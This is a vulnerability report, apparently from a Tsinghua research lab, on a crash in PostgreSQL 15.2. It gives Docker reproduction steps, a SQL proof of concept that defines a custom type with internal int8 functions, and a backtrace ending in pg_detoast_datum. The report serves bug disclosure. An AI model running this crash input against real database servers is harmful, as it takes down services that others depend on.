4. PostgreSQL Server Subprocess Went down at function 'pg_detoast_datum'

Description: PostgreSQL Server Subprocess Went down at function ‘pg_detoast_datum’

PostgreSQL Server Version: PostgreSQL 15.2 on x86_64-pc-linux-gnu, compiled by Ubuntu clang version 12.0.1, 64-bit

Discoverer: Jingzhou Fu, Jie Liang and Zhiyong Wu in WingTecher Lab of Tsinghua University and Shuimuyulin ltd

Email address: fjz22@mails.tsinghua.edu.cn  ,   wuzy21@mails.tsinghua.edu.cn  ,  ljiee@mail.tsinghua.edu.cn

Way to Reproduce with Docker (write the poc content into file PoC.sql):

```bash

docker container rm some-postgres -f

docker run --name some-postgres -p 5432:5432 -e POSTGRES_PASSWORD=mysecretpassword -d postgres:15.2

sleep 5 # wait the server start …

docker exec -i some-postgres psql --user=postgres < PoC.sql

# Output:

#   server closed the connection unexpectedly

#          This probably means the server terminated abnormally

#          before or while processing the request.

#   connection to server was lost

```

PoC:

```sql

create function parent(cstring) returns parent

  strict immutable language internal as 'int8in';

create function a(parent) returns cstring

  strict immutable language internal as 'int8out';

CREATE TYPE parent (

   internallength = variable,

   input = parent,

   output = a,

   alignment = int4

);

CREATE domain child as int not null check (value > 0);

create table grandchild (part int8 primary key, b child, c child);

explain (costs off)

  select * from grandchild where part = part and part = '42'::parent;

```

Backtrace:

```

#0 0x1cc6f79 (pg_detoast_datum+0x49)

#1 0xaeeffc (coerce_type+0xc5c)

#2 0xaeda7e (coerce_to_target_type+0x41e)

#3 0xb1603f (transformTypeCast+0x63f)

#4 0xb10786 (transformExprRecurse+0x2f6)

#5 0xb170cf (transformAExprOp+0xa7f)

#6 0xb1081d (transformExprRecurse+0x38d)

#7 0xb1b8ad (transformBoolExpr+0x5ed)

#8 0xb109a5 (transformExprRecurse+0x515)

#9 0xb1042a (transformExpr+0xba)

#10 0xad56c6 (transformWhereClause+0x46)

#11 0xa2484e (transformSelectStmt+0x85e)

#12 0xa1c6ee (transformStmt+0x22e)

#13 0xa1cd10 (transformOptionalSelectInto+0x390)

#14 0xa2c931 (transformExplainStmt+0x51)

#15 0xa1c761 (transformStmt+0x2a1)

#16 0xa1cd10 (transformOptionalSelectInto+0x390)

#17 0xa1be4e (transformTopLevelStmt+0x4e)

#18 0xa1bd6b (parse_analyze_fixedparams+0xcb)

#19 0x16e14b7 (pg_analyze_and_rewrite_fixedparams+0x97)

#20 0x16e922a (exec_simple_query+0x99a)

#21 0x16e7a63 (PostgresMain+0x1523)

#22 0x144c17b (BackendRun+0xbb)

#23 0x144ad85 (BackendStartup+0x525)

#24 0x14481e6 (ServerLoop+0x616)

#25 0x1443e0f (PostmasterMain+0x30cf)

#26 0x106ebf2 (main+0x5a2)

#27 0x7f5bf768c083 (__libc_start_main+0xf3)

#28 0x49fc0e (_start+0x2e)

```